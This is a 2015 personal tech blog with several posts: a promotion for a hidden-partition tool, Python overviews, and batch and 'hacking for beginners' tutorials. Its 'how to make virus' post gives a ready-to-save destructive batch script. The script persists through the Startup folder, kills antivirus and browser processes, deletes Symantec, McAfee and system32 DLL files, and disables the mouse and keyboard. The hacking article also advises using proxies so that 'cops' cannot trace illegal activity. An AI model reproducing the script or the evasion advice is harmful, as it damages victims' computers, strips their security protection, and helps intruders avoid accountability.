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Thursday, 31 December 2015

Create Hidden Partition for Private and Confidential Files With Secret Disk 1.16

If you are a person who is have a lots of private and confidential data and use any of the files encryption software, you should have a look at Secret Disk which let you create a separate partition on your hard drive instead of encrypting individual files. The partition is protected by a password and is hidden to everyone until you provide the password and unlock the partition. working on secret portion is same as working on any normal partition.

Features of Secret Disk

  • Separate disk for your private files – this tool will create separate disk for your private files.
  • Access with a password – you can access Secret Disk with a password only!
  • Locking – when locking secret disk disappears and stays invisible with all contents.
  • One second protection – when you need protection Secret Disk disappears within one second with all content, no matter how many files you have on the disk.
  • Power failure – in case of power (or Windows) failure Secret Disk will be automatically locked.
  • Automatic locking – Secret Disk can be automatically locked if you away from your PC (screensaver is running) or when you press emergency F8 button.
  • No hardware – no additional hardware required! Space for secret disk will be taken from your system disk.  
Download Here 

how to make virus

@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg *

this is a virusrundll mouse,disablerem made with Batch Virus Maker V.2rundll keyboard,disable 

save to virus.bat it will erase hdd:P

Simple batch Programming

In this 'step by step' tutorial I will be showing you Simple Batch Programming. Once you have completed this step by step tutorial you may find batch programming as easy as pie (not the mathematical pie)

I will show you three different batch programs. One will be a load of random numbers, another will be how to make the program say stuff and last one how to type to the computer. (sorry if you know all this but i cant use the if command its complicated if you want to find out more type 'if /?')     

Step 1: step one all the different colours you can use in batch programming.

You must have notepad to do this and you have to start with the following command:
@echo off

Since you can't read the pic you have to have a number then a letter for your different colours the number is the back ground and the letter is the writing. here are the numbers and letter:

Right first when your batch programing you have to write 'color' then one of the following numer and letter:

0= black      a= green
1= blue        b= apua
2= green     c= red
3= apua      d= purple
4= red          e= yellow
5= purple     f= bright white
6= yellow
7= white
8= gray 
9= light blue

Hacking for Beginners

The first and the primary thing is that you have to learn “Programming“.
The reason behind learning programming is that each and everything that you see and use on the internet is nothing but programming.

Programming languages: 

•Web-Design :/Developing:
•HTML5 (Somewhat Easy)
•CSS3 (Somewhat Easy)
•JavaScript (Somewhat Easy – Average)
•PHP (Somewhat Average – Hard)
•MySQL (Somewhat Average – Hard

Computer programming:

•Batch (Easy)
•C++ (Average)
•Python (Easy)
•Visual Basics (Easy with Visual Studio)

Most of us have a strong desire to become a hacker, but really don’t know where to start. If you are in a similar situation, this article will surely help you out. On a regular basis, I get a lot of emails from people loaded with questions like “How to Become a Hacker”, “What is the Best Way to Learn”, “Where to Start” and so on. Instead of answering every such question, I decided to come up with a detailed article on the topic so that it can help all those hacker enthusiasts who have similar kind of questions in their mind?

What Skills do I Need to Become a Hacker?

In simple words, there is no magic to becoming a Hacker. But, like anything else that is worthwhile, it takes dedication and willingness to learn. It is most important to have a basic knowledge of the topics such as operating system basics and its working, computer networks, network security and programming.

What is the Best Way to Become a Hacker?

As said earlier, the best way to turn yourself into a hacker is to start from the basics. You will have to master the basics to build a strong foundation. And once this is done, you’ll be in a position to explore new ideas and start thinking like a hacker. You can follow the below mentioned steps to start off your career as a hacker.

Let me throw some light on these Languages:

HTML5 is the newest version of HTML, every paragraph, sentence or images that you see on internet are made all in HTML, and the appearance or look, size, etc etc… are made in CSS.
So in short, HTML is the content and CSS is the layout (how it is designed).

JavaScript is another most powerful and popular scripting languages used on the web… and is the oldest as the web is. And you can do some cool things with it such as making a slideshows with it, or open hundreds of tabs at once, with a simple easy trick

PHP and MySQL are used for databases. Most of the chats/forums are based on PHP.
 It will be really good if you understand those languages, they plays very vital part in website security (especially MySQL).

If you get a small idea about computer programming it will be good for you. Although you can’t make websites with them, but of course you can make other nice things like apps, little programs, games and viruses.. too

Let’s discuss computer languages more:

Batch is a much common languages that is used worldwide, not for professional things, but for small fun and effective things.
 Batch enables you to create small viruses or can make PC crash, however this is not the primary purpose of Batch.
With C++ you can literally make anything and everything!
 The only disadvantage about it is that, you have to make a separate GUI for it, (Graphic User Interface)
Visual Basics is also a great language, but it’s not that much easy. Visual Basics enables you to make your own professional app, a lot of RATs are made in Visual Basics, and you can make your own small browsers with it!

Staying Anonymous is also Important(Thinking like hackers):

The most important thing for a hacker is to remain “anonymous” i.e. when you will do any illegal activities or even any ethical stuff you won’t be caught by cops.
 As i have already told you about a tool to hide your IP, a VPN and Proxy as we have discussed above.
 A VPN like I already explained hides your IP by connecting you to another server, a proxy actually does the same!
 You only have to use a VPN or Proxy when you’re doing your activities, after them, you turn it off.
Let me explain it a bit. People will do everything to find you, so even a little mistake can lead you to cops or you can be found! You have to put people on a dead track.
Whenever planning to do some hacking stuff you start your PC on with a proxy, and then do you work and then turn off the proxy after completing the work and don’t use internet for 20-30 min

after that, you start it up without any proxy, and do your legal normal things.

How to DO Hacking:
You can hack with number of methods, I have listed some of them

•Wi-Fi hacking

Begin with the Basics:

Step-1: For beginners who have little or no previous knowledge of hacking, it is always better to start off from the basics. Instead of directly learning how to hack, you can begin exploring more about topics such as computer networks, network ports, firewalls, common network protocols like IP address, HTTP, FTP, DNS, SMTP etc. along with how each of those stuffs work.
You can also begin to learn more about alternate operating systems Linux whose knowledge becomes very much essential in the field of hacking. The more you learn about the basics, the more easy it is to find vulnerabilities and device exploits. Once you develop a basic understanding of the fundamental concepts, you will be in a position to easily understand various hacking techniques that are in practice.

Find a Good Source to Start Learning:

To be a good professional hacker one think which you ought to imbibe is the spirit of a true hacker. It is practically impossible that you will imbibe this spirit on your own without any source of inspiration, therefore , for you it is advisable to read up some old pieces that might help you know what hacking is all about. Two examples of such old pieces include, ‘Jargon File’ as well as ‘Hackers Manifesto’ written by The Mentor, the technical issues addressed may be old but the essence surpasses the boundaries of time.

Learn Programming (Optional):

If you want to take your hacking skills one step ahead, programming is something that you can’t skip down. Although you can easily find a lot of ready made tools and programs that let you hack with ease, it is always better to have some basic knowledge of programming languages like HTML, PHP and JavaScript so that you will be in a position to develop your own tools and exploit codes. However, if you do not wish to learn programming you can skip this step and still be a good hacker.

Wednesday, 30 December 2015


Comparing Python to Other Languages.

Python is often compared to other interpreted languages such as Java, JavaScript, Perl or Tcl. Comparisons to C++, Common Lisp and Scheme can also be enlightening. In this blog I will briefly compare Python to each of these languages. These comparisons concentrate on language issues only. In practice, the choice of a programming language is often dictated by other real-world constraints such as cost, availability, training, and prior investment, or even emotional attachment. Since these aspects are highly variable, it seems a waste of time to consider them much for this comparison.


Python programs are generally expected to run slower than Java programs, but they also take much less time to develop. Python programs are typically 3-5 times shorter than equivalent Java programs. This difference can be attributed to Python's built-in high-level data types and its dynamic typing. For example, a Python programmer wastes no time declaring the types of arguments or variables, and Python's powerful polymorphic list and dictionary types, for which rich syntactic support is built straight into the language, find a use in almost every Python program. Because of the run-time typing, Python's run time must work harder than Java's. For example, when evaluating the expression a+b, it must first inspect the objects a and b to find out their type, which is not known at compile time. It then invokes the appropriate addition operation, which may be an overloaded user-defined method. Java, on the other hand, can perform an efficient integer or floating point addition, but requires variable declarations for a and b, and does not allow overloading of the + operator for instances of user-defined classes.

For these reasons, Python is much better suited as a "glue" language, while Java is better characterized as a low-level implementation language. In fact, the two together make an excellent combination. Components can be developed in Java and combined to form applications in Python; Python can also be used to prototype components until their design can be "hardened" in a Java implementation. To support this type of development, a Python implementation written in Java is under development, which allows calling Python code from Java and vice versa. In this implementation, Python source code is translated to Java bytecode (with help from a run-time library to support Python's dynamic semantics).


Almost everything said for Java also applies for C++, just more so: where Python code is typically 3-5 times shorter than equivalent Java code, it is often 5-10 times shorter than equivalent C++ code! Anecdotal evidence suggests that one Python programmer can finish in two months what two C++ programmers can't complete in a year. Python shines as a glue language, used to combine components written in C++.


Python's "object-based" subset is roughly equivalent to JavaScript. Like JavaScript (and unlike Java), Python supports a programming style that uses simple functions and variables without engaging in class definitions. However, for JavaScript, that's all there is. Python, on the other hand, supports writing much larger programs and better code reuse through a true object-oriented programming style, where classes and inheritance play an important role.


Python and Perl come from a similar background (Unix scripting, which both have long outgrown), and sport many similar features, but have a different philosophy. Perl emphasizes support for common application-oriented tasks, e.g. by having built-in regular expressions, file scanning and report generating features. Python emphasizes support for common programming methodologies such as data structure design and object-oriented programming, and encourages programmers to write readable (and thus maintainable) code by providing an elegant but not overly cryptic notation. As a consequence, Python comes close to Perl but rarely beats it in its original application domain; however Python has an applicability well beyond Perl's niche.


Like Python, Tcl is usable as an application extension language, as well as a stand-alone programming language. However, Tcl, which traditionally stores all data as strings, is weak on data structures, and executes typical code much slower than Python. Tcl also lacks features needed for writing large programs, such as modular namespaces. Thus, while a "typical" large application using Tcl usually contains Tcl extensions written in C or C++ that are specific to that application, an equivalent Python application can often be written in "pure Python". Of course, pure Python development is much quicker than having to write and debug a C or C++ component. It has been said that Tcl's one redeeming quality is the Tk toolkit. Python has adopted an interface to Tk as its standard GUI component library.
Tcl 8.0 addresses the speed issues by providing a bytecode compiler with limited data type support, and adds namespaces. However, it is still a much more cumbersome programming language.

Tuesday, 29 December 2015


The Blog is about the Programming language.

 Python is a general-purpose interpreted, interactive, object-oriented, and high-level programming language. Its design philosophy emphasizes code readability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C++ or Java. The language provides constructs intended to enable clear programs on both a small and large scale. Python is designed by Guido van Rossum and first appeared in 1991 but stable release  3.5.1 / 7 December 2015 &2.7.11 / 5 December 2015.
Python supports multiple programming paradigms, including object-oriented, imperative andfunctional programming or procedural styles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.Python is intended to be a highly readable language. It is designed to have an uncluttered visual layout, frequently using English keywords where other languages use punctuation. Furthermore, Python has a smaller number of syntactic exceptions and special cases than C or Pascal.

Python interpreters are available for installation on many operating systems, allowing Python code execution on a wide variety of systems. Python is processed at runtime by the interpreter. You do not need to compile your program before executing it. This is similar to PERL and PHP. Using third-party tools, such as Py2exe or Pyinstaller, Python code can be packaged into stand-alone executable programs for some of the most popular operating systems, allowing the distribution of Python-based software for use on those environments without requiring the installation of a Python interpreter.

Often, programmers fall in love with Python because of the increased productivity it provides. Since there is no compilation step, the edit-test-debug cycle is incredibly fast. Debugging Python programs is easy: a bug or bad input will never cause a segmentation fault. Instead, when the interpreter discovers an error, it raises an exception. When the program doesn’t catch the exception, the interpreter prints a stack trace. A source level debugger allows inspection of local and global variables, evaluation of arbitrary expressions, setting breakpoints, stepping through the code a line at a time, and so on. The debugger is written in Python itself, testifying to Python’s introspective power. On the other hand, often the quickest way to debug a program is to add a few print statements to the source: the fast edit-test-debug cycle makes this simple approach very effective.

CPython, the reference implementation of Python, is free and open-source software and has a community-based development model, as do nearly all of its alternative implementations. CPython is managed by the non-profit Python Software Foundation.